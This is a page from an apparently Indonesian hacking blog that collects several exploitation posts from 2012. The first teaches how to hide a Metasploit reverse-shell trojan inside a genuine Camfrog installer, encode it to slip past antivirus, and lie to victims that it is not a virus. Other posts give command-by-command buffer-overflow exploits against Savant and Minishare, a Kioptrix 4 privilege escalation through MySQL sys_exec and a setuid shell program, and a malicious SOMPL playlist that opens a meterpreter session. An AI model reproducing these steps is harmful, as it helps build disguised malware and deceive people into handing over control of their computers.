Pages

Banner 468 x 60px

 
Tampilkan postingan dengan label exploitation. Tampilkan semua postingan
Tampilkan postingan dengan label exploitation. Tampilkan semua postingan

Selasa, 14 Agustus 2012

Don't Fuck With Metasploit

0 komentar
Aaaah.... Sepertinya postingan kali ini akan menuai kontroversi. Tapi tidak apa, toh saya hanya sharing, jika ada yang menggunakannya untuk kejahatan, itu tanggung jawab anda. Kali ini saya akan mengajarkan anda bagaimana caranya membuat trojan anda tersamar dengan sempurna. Ya, sangat sempurna! Jika antivirus menghalangi anda, omong kosong! Sebuah trik Social Engineering akan membawa anda dalam kesempurnaan eksploitasi.

Yang anda butuhkan hanyalah

1. Metasploit (dapat di download di sini)


How to?

1. Buat trojan sederhana, kemudian bungkus trojan dengan aplikasi yang anda inginkan.

Dalam hal ini, saya akan menggunakan file installer camfrog. Ya, siapa yang tidak tertarik dengan camfrog? Karena dengan membawa aplikasi ini, proses Social Engineering Attack (Human Hacking Art) akan lebih mudah.

Untuk membuat file trojan anda dapat menggunakan msfpayload. Sementara untuk membungkus trojan, anda bisa menggunakan msfencode.

Command :
red-dragon [~] msfpayload windows/shell_reverse_tcp LHOST=172.16.82.1 LPORT=4444 R | msfencode -a x86 -e x86/shikata_ga_nai -c 4 -t exe -x /root/camfrog.exe > /root/Desktop/camfrog.exe

Keterangan:
1. Saya akan menggunakan payload jenis windows/shell_reverse_tcp, jika sesi terbuka, maka saya langsung mendapatkan command prompt target.
2. Karena payload berjenis reverse connection, maka saya memasukan opsi LHOST dimana LHOST bernilai IP address saya.
3. LPORT adalah port yang saya gunakan untuk menerima sesi command shell.
4. Trojan ini kemudian saya encode dengan arsitektur x86 (32 bit)
5. Kemudian saya encode dengan encoder x86/shikata_ga_nai
6. Saya melakukan encode sebanyak 4 kali.
7. Kemudian output file berekstensi exe (executable file for windows)
8. Sebagai penutup kedok, saya menggunakan file camfrog.exe. Ini file asli yang saya download dari situs camfrog.
9. Kemudian hasil encoding saya simpan di Desktop dengan nama camfrog.exe


Ini file camfrog asli, yang saya gunakan untuk pembungkus trojan.


Dan ini hasil trojan yang saya buat.


Tidak ada bedanya kan? Secara ukuran dan penampilanpun, metasploit nyaris tidak membuat kecacatan dalam meniru. Namun berbeda fungsi. Kita lihat apa yang terjadi ketika file ini dieksekusi. Namun sebelumnya, anda harus melakukan aktifitas listening dengan netcat di port 4444.

Command :
red-dragon [~]  netcat -l -v -p 4444


Ketika file ini dieksekusi....


Note : Jika file terdeteksi virus, gunakan Human Hacking Art. Katakan saja ini adalah camfrog full version, mampu menonton video streaming dengan resolusi tinggi, dan bukan virus.

You are soooo
Owned by
red-dragon
Read more...

Senin, 13 Agustus 2012

Vulnerable By Design [1-25]

0 komentar
Vulnerable by design? Ya, dilemahkan oleh design. Operasi-operasi sistem ini memiliki vulnerable yang unik, tidak semua peretas dapat menemukan celah keamanan operasi sistem ini. Bahkan saya ragu pada peretas yang bermulut besar dapat menemukan celah kemanan operasi sistem ini.

Lalu, untuk apa operasi-operasi sistem ini dibuat? Tentu saja untuk melatih para penetration tester dalam mengasah kemampuan menganalisa dan mencari vulnerability sebuah operasi sistem. Tujuan akhir para penetration tester yang menguji OS ini adalah untuk mendapatkan hak akses (privilege) tertinggi dalam OS ini. Mengingat OS ini berbasis linux, maka anda selaku penetration tester harus dapat mendapatkan akun root dalam OS ini. Mudahkah? Beberapa dari OS ini mudah di retas, bahkan diretas hingga ke akarnya (root). 

Dalam blog ini, beberapa jenis Vulnerable by Design telah dipaparkan, sebut saja kioptrix level 1, kioptrix level 3, kioptrix level 4, de ice, dan banyak lagi. Salah satu rahasia memiliki kemampuan analisa tinggi, adalah mencoba tantangan ini, tantangan untuk memperoleh root dalam box box vulnerable ini. Percayalah, ketika anda mendapatkan root dari salah satu vulnerable by design, anda akan langsung mendapatkan banyak ilmu mengenai sistem keamanan dalam UNIX server dan non-server.

Kemampuan menganalisan vulnerability saya berawal dari proses ini, dimana kemampuan penguasaan tools backtrack benar-benar diuji dalam usaha mendapatkan root dalam box ini. Dan satu hal yang saya pelajari dari rooting box ini:

"Jangan bergantung pada segelintir tools yang dimiliki oleh backtrack dalam meretas satu system, anda tidak tau betapa berbahayanya mereka ketika semua tools bahu membahu mengikis pertahanan sebuah system. Tingkat keberhasilan anda bergantung pada banyaknya tools yang dapat anda gunakan dalam peretasan sebuah system."

Berikut saya akan membagi beberapa vulnerable by design yang bisa anda coba untuk mempertajam kemampuan penetration testing anda.

1. De - ICE
Level yang tersedia : Level 1 - Disk 1 , Level 1 - Disk 2, Level 1 - Disk 3, Level 2 - Disk 1

2. Hackademic
Level yang tersedia : Level 1 (Box 1), Level 2 (Box 2)

3. Holynix
Level Yang tersedia : Level 1, Level 2

4. Kioptrix
Level yang tersedia : Level 1 , Level 2, Level 3, Level 4

5. Metasploitable
Level yang tersedia : Level 1 , level 2

6. NcN 2011
Level yang tersedia : Level 1 , Level 2, Level 3, Level 4, Level 5, Level 6

7. NETinVM
Level yang tersedia : Level 1, Level 2, Level 3

8. pWnOS
Level yang tersedia : Level 1

9. RuCTFE
Level yang tersedia : Level 1

10. vulnimage
Level yang tersedia : Level 1

11. BadStore
Level yang  tersedia : Level 1

12. BodeIT
Level yang teredia : Level 1

13. Damn Vulnerable Web App
Level yang tersedia : Level 1

14. Hacme
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5

15. Hackxor
Level yang tersedia : Level 1

16. LAMPSecurity
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5, Level 6

17. Moth
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5, Level 6

18. Mulitilidae
Level yang tersedia : Level 1 (v 1.5)

19. OWASP Broken Web Application Project
Level yang tersedia : Level 1 (v 0.92rc1)

20. OWASP Hackademic Challenge Project 
Level yang tersedia : Level 1

21. OWASP Insecure Web App Project
Level yang tersedia : Level 1

22. OWASP Vicnum
Level yang tersedia : Level 1 (v 1.4)

23. OWASP WebGoat
Level yang tersedia : Level 1 

24. PuzzleMail
Level yang tersedia : 1

25. SecurityBench 
Level yang tersedia : Level 1 (Normal), Level 2 (Micro)

Ada lebih dari 50 OS Vulnerable yang pernah dibuat untuk dijadikan sarana belajara para peserta Hackademic, dan para penetration tester. Untuk saat ini, saya akan membagikan 25 OS terlebih dahulu. Beberapa dari OS diatas pernah diulas di dalam blog ini, jika anda ingin mencari tau apa yang harus anda lakukan untuk merooting OS ini, ada baiknya anda menggunakan vitur search pada blog ini. Good luck, and have fun. (=
Read more...

Kamis, 28 Juni 2012

POC Owning Shell From Zero Day Attack [2]

0 komentar
Pada post sebelumnya, saya sudah memberikan prove of concept dari zero day attack terhadap application web server Savant. Sangat menarik mengetahui zero day mampu mengeksploitasi sebuah web server kurang dari 10 detik dengan sederet shell code. Semua ini berawal dari buffer overflow, dimana aplikasi server mengalami crash, kemudian status crash diambil alih oleh shell code. Shell code yang terdapat pada exploit savant, membuat system mengeksekusi command prompt untuk dapat diakses oleh peretas pada port 4444. Kali ini saya akan memberikan sebuah prove of concept kembali, namun berbeda dengan postingan sebelumnya, kali ini saya akan menguji kebenaran dari exploit saya yang terdapat pada situs 1337day.

Exploit kali ini, anda akan melihat bahwa shell code ini bekerja jauh lebih cepat dari pada exploit Savant. Karena di dalam shell code savant, saya menggunakan egg hunter untuk mencari celah buffer yang lebih besar agar shell code saya dapat masuk ke dalam system. Pencarian egg hunter sendiri cukup lama, sekitar 3-5 detik. Jika tidak menggunakan egg hunter, proses exploitasi hanya membutuhkan waktu 2-4 detik saja. Sebagai informasi, exploit ini hanya bekerja pada aplikasi Minishare versi 1.4.1.


1. Reconnaissance

Mencari tau aplikasi apa yang digunakan oleh sebuah web server adalah bagian yang paling esensial dalam proses exploitasi. Tidak peduli sebanyak dan sehebat apapun exploit yang anda miliki jika anda tidak mengetahui seluk beluk target anda. Untuk itu, saya akan memulai dari tahap reconnaissance atau information gathering (pengumpulan informasi). Dalam tahap information gathering, saya terbiasa menggunakan nmap untuk mencari tau port dan aplikasi apa saja yang sedang berjalan pada web server target saya. Untuk mendapatkan nmap, anda bisa donwload di sini.

Saya mulai saja untuk mencari informasi target dengan nmap

Command :
root@red-dragon:~# nmap -p 80 -sS -sV -Pn -T5 -vv 10.10.1.128

Kita mendapatkan port 80 terbuka, dan nmap menemukan bahwa web server ini menggunakan Minishare 1.4.1 sebagai aplication servernya.



2. Editing Shell Code

Shell code untuk minishare bisa anda dapatkan di 1337day. Namun anda harus melakukan sedikit modifikasi dari shell code ini. Bagian yang harus anda modifikasi adalah target_ip. Sesuaikan ini dengan target web server anda. Dalam kasus ini, target saya adalah 10.10.1.128.


Setelah shell code telah dimodifikasi, langkah selanjutnya adalah mengirim shellcode ini ke target web server.

3. The Joy of Exploitation

Sebelum shell code ini dikirim, saya akan melakukan pembuktian. Kita tau bahwa shell code ini akan membuka sesi shell command yang bisa diakses pada port 4444. Maka saya akan mencoba mengecek, apakah port 4444 terbuka? Saya akan mengecek port ini dengan netcat.

Command :
root@red-dragon:~# netcat -v 10.10.1.128 4444


Kemudian saya kirim shell code ini.

Command :
root@red-dragon:~# python minishare.py


Kemudian saya akses kembali port 4444 dengan netcat.

Command :
root@red-dragon:~# netcat -v 10.10.1.128 4444


Done. You've got the shell.

OWNED by red-dragon
Read more...

Rabu, 27 Juni 2012

POC Owning Shell From Zero Day Attack [1]

0 komentar

Belakangan ini, saya menangkap traffic yang cukup menggiurkan di internet. 78% peretas indonesia ternyata sedang mencari tau konsep exploitasi yang cepat, dan mudah. Tidak ada yang lebih cepat dan mudah dari pada serangan zero day. Tidak seperti SQL injection yang memakan waktu paling cepat 5 menit sebelum peretas akhirnya mendapatkan akses ke dalam situs yang berkaitan. Namun zero day attack hanya membutuhkan waktu kurang dari 10 detik untuk mendapatkan shell.

Kali ini saya akan memberikan prove of concept dari exploit zero day yang saya buat di exploit-db. Dan anda akan melihat betapa cepatnya serangan ini berlangsung. Kali ini target saya adalah windows XP SP2 English. Target saya membuka HTTP port (80), dan menggunakan Savant versi 3.1 sebagai web servernya. Yang akan saya lakukan adalah mengeksploit Savant versi 3.1 dengan sederet script python, yang kemudian akan membuat Savant mengalami buffer overflow.

Exploit saya telah masuk dalam daftar database exploit db. Untuk pengguna backtrack, file ini dapat ditemukan dengan perintah.

Command :
root@red-dragon:~# cd /pentest/exploits/exploitdb/
root@red-dragon:/pentest/exploits/exploitdb# cat files.csv | grep -i savant | grep "red-dragon" | awk -F "," '{print "File located in:", $2, "| The filename is:",  $3, "by", $5}'
File located in: platforms/windows/remote/18401.py | The filename is: "Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)" by red-dragon


Ok. Kita sudah mendapatkan file exploit pada /pentest/exploits/exploitdb/platforms/windows/remote/18401.py. Tahap selanjutnya adalah membuat file ini menjadi peluru bagi web server.

1. Konfigurasi Exploit 

Untuk mengkonfigurasikan exploit, kita hanya perlu sedikit mengedit file exploit. Di dalam file exploit ini, terdapat bagian pengaturan IP target. Anda harus mengubah ini agar exploit dapat dikirim ke web server yang anda tuju. Sebelumnya, kita harus mengkopi file ini sehingga kita tidak mengubah file asli yang didownload dari exploitdb.

Command :
root@red-dragon:/pentest/exploits/exploitdb# cp platforms/windows/remote/18401.py /tmp/savant.py

File ini saya copy ke folder /tmp. Kemudian saya edit di bagian IP address menjadi IP target saya 10.10.1.128.

Command :
root@red-dragon:/tmp# nano savat.py

Ok. Setelah file di edit. Sekarang kita ke bagian PoC. Sesuai dengan fungsi file exploit kita, server akan membuka koneksi netcat pada port 4444 setelah exploit buffer overflow dikirim. Saya akan mencoba masuk ke dalam port 4444 sebelum exploit dikirim.

Command :
root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) : Connection refused


Port ini masih tertutup. Kemudian saya kirim file exploit milik saya.

Command :
root@red-dragon:/tmp# python savant.py

Dan kita cek lagi dengan netcat.

root@red-dragon:/tmp# nc -v 10.10.1.128 444410.10.1.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.1.128] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Savant>



Perhatikan screenshoot di atas. Anda dapat melihat seberapa cepat zero day dalam melakukan defacing web dengan mengendalikan shell korban. Jika saya tidak mengambil screenshoot, waktu yang dibutuhkan oleh file exploit ini hanya 10 detik.

OWNED by : red-dragon
Read more...

Minggu, 24 Juni 2012

Kioptrix 4 Rooting from Vulnerable Database

0 komentar
Belakangan ini, saya menemukan vulnerability baru pada kioptrix level 4. Vulnerability ini terletak pada database, yang memiliki hak akses sebagai root, sehingga MySQL dapat membuat file dengan root sebagai pemiliknya. Hal ini memungkinkan attacker untuk memodifikasi file-file yang bersifat sensitif seperti passwd, dan shadow.

Mari kita lihat kembali postingan sebelumnya mengenai rooting Kioptrix 4 hanya dengan menggunakan SQLmap. Pada alur penyerangan di atas, attacker membuat file baru pada direktori /etc/cron.d dengan root sebagai user yang akan mengeksekusi file tersebut. Attacker mengatur root untuk melakukan koneksi netcat dengan mengeksekusi /bin/bash setelah koneksi terjadi. Attacker hanya menggunakan database MySQL untuk membuat file exploit pada direktori /etc/cron.d. Dari sinilah sebuah metode rooting kembali ditemukan.

Saya akan mengajak anda kembali pada postingan SQL Injection Level 4 Part 2, diketahui bahwa terdapat 2 akun yang dapat kita gunakan untuk login kedalam mesin kioptrix. Yaitu user john dan robert. Anda sebenarnya dapat langsung mengakses secure shell dengan perintah ssh 'username'@'domain' untuk dapat login ke dalam kioptrix 4.

Kali ini saya mengambil username john sebagai uji coba keberhasilan exploit root ini. Karena password john lebih mudah daripada password robert. ;)
Perlu diketahui juga, bahwa kioptrix 4 telah dipersenjatai dengan perisai shell yang disebut secure shell. Secure shell mencegah user untuk mengeksekusi perintah tertentu. Dalam hal ini, user hanya memiliki batas tiga kali melakukan kesalahan sebelum akhirnya di kicked out oleh system. 


Telah kita ketahui bahwa secure shell yang dimiliki oleh kioptrix 4 memungkinkan user untuk mengeksekusi perintah echo, cd, clear, ll, exit, ?, help, lpath, ls. Untuk keluar dari secure shell, kita harus mendapatkan bash interpreter. Caranya mudah sekali, cukup masukan perintah

Command :
echo os.system("/bin/bash") 

Dan bash interpreterpun telah tereksekusi, sehingga tidak ada limitation dalam mengeksekusi sebuah perintah. Kita telah berhasil membobol secure shell, lalu bagaimana cara mengangkat privilege kita menjadi root?

Setelah masuk kedalam system dengan ssh, kita akan mulai information gathering, dimulai dari kebenaran vulnerability yang ditemukan pada database MySQL kioptrix 4.

 

Saya beralih ke direktory /tmp, kemudian membuat file red-dragon dengan database mysql menggunakan perintah SELECT sys_exec.


Command :
mysql > select sys_exec('COMMAND HERE');


Sebagai contoh, saya akan membuat file red-dragon pada direktory /tmp. Maka perintah SQLnya adalah:


Command :
mysql > select sys_exec('touch /tmp/red-dragon');

Kemudian kita kembali lagi pada bash console, dan melihat ownership file ini dengan perintah



Command :
$ ls -lah /tmp/red-dragon


Ternyata file ini milik root, ini berarti sebuah vulnerable yang fatal dimana scrip bahasa C yang sederhana dapat mengangkat privileges user biasa, menjadi root. Semenjak kita tau bahwa kioptrix4 tidak memiliki GCC, maka saya melakukan kompile pada backtrack, kemudian mengupload file ini yang selanjutnya akan diupload ke dalam komputer korban.


Pertama, saya buat file exploit.c pada direktori /tmp. Mengapa /tmp? Ini karena agar saya tidak perlu repot menghapus file ini kelak, karena setiap file yang ada di folder /tmp akan dihapus setiap komputer melakukan halting. Bagaimana wujud script bahasa C yang saya gunakan?

Command :
int main(){setresuid(0, 0, 0);setresgid(0, 0, 0);system( "/bin/sh" );return 0;}


Enam baris script ini akan mengangkat privilege john menjadi root. Langsung saja saya compile script ini dengan bantuan GCC.



Command :
root@red-dragon:/tmp# gcc exploit.c -o exploit

Perintah diatas akan menkompilasi file exploit.c, dan hasil compile diberi nama exploit. Secara default, file ini akan memiliki +x permission, atau bisa dieksekusi.


Kioptrix juga telah dipersenjatai dengan iptables, sehingga atacker tidak dapat sembarang mengupload file exploit ke dalam system exploit. Hal ini dikarenakan kioptrix telah mengatur iptables untuk memutus koneksi yang keluar menuju port 21 (FTP), 4444 (Standar Port Listener Metasploit), 80 (HTTP). Untuk itu saya menggunakan module python yang bernama Simple HTTP Server yang membuka port listener pada port 8000. Port 8000 tidak difilter oleh kioptrix, sehingga atacker dapat mengupload file exploit melalui port ini dengan perintah wget.


Perlu diketahui juga, module Simple HTTP Server menggunakan home direktory sesuai dengan current directory bash interpreter anda. Jika anda menjalankan module ini pada folder /root, maka home directory module ini juga berada di root, sehingga memungkinkan penyusup mendownload file anda yang berada pada directory root. Usahakan anda menjalankan module ini pada folder yang sama ketika anda melakukan compile exploit. Dalam hal ini saya melakukannya pada direktory /tmp. Untuk menjalankan module simpe http server, cukup masukan perintah:

Command :
root@red-dragon:/tmp# python -m SimpleHTTPServer


Setelah module berhasil dieksekusi, langkah selanjutnya adalah mengirim file expoit kita ke system kioptrix dengan bantuan wget.


File exploit kita telah berhasil diupload ke system pada direktory /tmp. Hal yang perlu diketahui agar file root exploit ini berjalan, adalah dengan mengubah file ownership, dan file permission. Anda harus mengubah file permission menjadi +s,a+rwx, dan mengubah ownership menjadi root. Untuk melakukan pengubahan file permission dan ownership, anda harus memiliki hak akses root. Untuk itu kita akan kembali menggunakan MySQL untuk mengeksekusi perintah shell, dengan sys_exec().

Pertama, kita akan mengubah file permission.

Command :
mysql > SELECT sys_exec("chmod +s,a+rwx /tmp/exploit");

Atau

Command :
john@Kioptrix4:/tmp$ mysql -u root -e "select sys_exec('chmod +s,a+rwx /tmp/exploit');"


Setelah kita merubah file permission, maka file permission akan menjadi -rwsrwsrwx. Selanjutnya kita akan mengubah file ownership ini menjadi milik root. Mengubah ownership-pun harus menggunakan hak akses root. Untuk itu kita akan menggunakan MySQL lagi untuk mengeksekusi perintah sys_exec().

Command :
mysql > SELECT sys_exec("chown root:root /tmp/exploit");

Atau

Command :
john@Kioptrix4:/tmp$ mysql -u root -e "select sys_exec('chown root:root /tmp/exploit');"


Setelah file ownership telah diubah, kita hanya perlu mengeksekusi file ini untuk menjadi root.

Command :
john@Kioptrix4:/tmp$ ./exploit

Kemudian cek dengan perintah id


You are so.....


OWNED by : red-dragon
Read more...

Minggu, 17 Juni 2012

Metasploit VS SOMPL Player

0 komentar
Setelah sekian lama tidak kembali dalam dunia peretasan system, kali ini saya mencoba kembali menguji system keamanan yang dimiliki oleh SOMPL player yang saya jalankan pada Windows XP SP2 (Unpatched version).

Vulnerability ini saya dapatkan dari Exploit-DB. Kemudian di modifikasi oleh metasploit sehingga attacker dapat menggunakan payload yang beragam. Untuk mengujinya, pertama saya mendownload MP3 Player ini dari Softpedia. Kemudian menjalankan MP3 player ini di Windows XP SP2 English Version.

Tutorial Requirements:
1. metasploit 
2. SOMPL Player
3. Windows XP SP2
4. vmware


Conditions:
1. Attacker IP : 10.10.1.1
2. Target IP : 10.10.1.128




Jika semua persiapan sudah siap, maka anda bisa memulai tutorial ini.


Walkthrough:

1. Buat malicious file


Pada konsol metasploit, kita dapat mencari exploit, payload, nops, auxiliary, encoder, dan post yang kita inginkan. Perintah ini dapat dieksekusi dengan


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > search


Contoh, jika kita hendak mencari encoder shikata_ga_nai, maka kita masukan perintah:

Note: Tulisan yang dicetak merah, adalah output. Yang dicetak biru adalah input.


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > search shikata_ga_nai Matching Modules
================
Name                          Rank       Description
----                          ---------  -----------
encoder/x86/shikata_ga_nai    excellent  Polymorphic XOR Additive Feedback Encoder



Untuk mencari exploit yang akan kita gunakan, maka kita masukan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > search sompl
Matching Modules
================

   Name                                        Disclosure Date  Rank   Description
   ----                                        ---------------  ----   -----------
   exploit/windows/fileformat/somplplayer_m3u  2010-01-22       great  S.O.M.P.L 1.0 Player Buffer Overflow


Kemudian kita gunakan exploit ini untuk membuat malicious file, yang kemudian akan dikirimkan ke target.


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf > use exploit/windows/fileformat/somplplayer_m3u
msf  exploit(somplplayer_m3u) >


Kemudian kita atur file ini dengan opsi yang disediakan.


1. PAYLOAD : Menentukan payload yang akan digunakan oleh attacker.
2. FILENAME : Nama malicious file yang akan dibuat


Note : Jika anda menggunakan PAYLOAD reverse, maka anda akan menggunakan opsi berikut:
1. LHOST : IP Attacker
2. LPORT : Attacker's port listener


Note : Jika anda menggunakan PAYLOAD bind, maka anda akan menggunakan opsi berikut:
1. RHOST: IP Target
2. LPORT : Target's port listener


Anda juga bisa menggunakan encoder dalam membuat file ini:
1. ENCODER

Atur setiap opsi dengan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)

msf exploit(somplplayer_m3u) > set [OPTION] [VALUE]

Contoh, kali ini saya menggunakan


1. PAYLOAD: windows/meterpreter/reverse_tcp
2. FILENAME : red-dragon.m3u
3. LHOST : 10.10.1.1
4. LPORT: 4444


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(somplplayer_m3u) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(somplplayer_m3u) > set FILENAME red-dragon.m3u
FILENAME => red-dragon.m3u
msf  exploit(somplplayer_m3u) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf  exploit(somplplayer_m3u) > set LPORT 4444
LPORT => 4444
msf  exploit(somplplayer_m3u) >



Kemudian kita buat file dengan mengeksekusi perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(somplplayer_m3u) > exploit

[*] Creating 'red-dragon.m3u' file ...
[+] red-dragon.m3u stored at /root/.msf4/local/red-dragon.m3u




File kita telah di simpan di /root/.msf4/local/red-draon.m3u. File ini yang akan membuka akses attacker untuk mendapat sesi meterpreter.




2. Setup Exploit Multi Handler


Setelah file terbuat, maka langkah selanjutnya adalah mengatur exploit multi hander, dan menjalankan listener pada koneksi meterpreter yang terpicu. Untuk menggunakan multi hanlder, kita dapat menggunakan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf > use exploit/multi/handlermsf  exploit(handler) >

Kemudian kita atur opsi yang ada, SAMA seperti yang telah kita atur pada langkah pertama.


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf  exploit(handler) > set LPORT 4444
LPORT => 4444
msf  exploit(handler) >





Setelah semua telah diatur, kita jalankan exploit ini dengan perintah


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(handler) > exploit[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...




TIDAK akan ada sesi meterpreter yang muncul jika payload kita belum terpicu, untuk itu, kita kirimkan file ini kepada korban, dan menunggu sampai korban membuka file ini dengan SOMPL player.



3. RED-DRAGON is OWNING!


Setelah korban menjalankan file ini dengan SOMPL player, maka SOMPL player akan mengalami buffer overflow, dimana program menjadi tidak stabil dan tidak merespon perintah.




Dan kita mendapat sesi meterpreter pada konsol metasploit kita..


Command :
       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 884 exploits - 482 auxiliary - 145 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15464 updated today (2012.06.17)
  msf  exploit(handler) > exploit

[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 10.10.1.128
[*] Meterpreter session 1 opened (10.10.1.1:4444 -> 10.10.1.128:1059) at 2012-06-18 11:35:10 +0700

meterpreter >







You are so....
0wn3d by red-dragon
Read more...
 
Es Sia © 2012 The Cyber Chrome. Supported by Alexa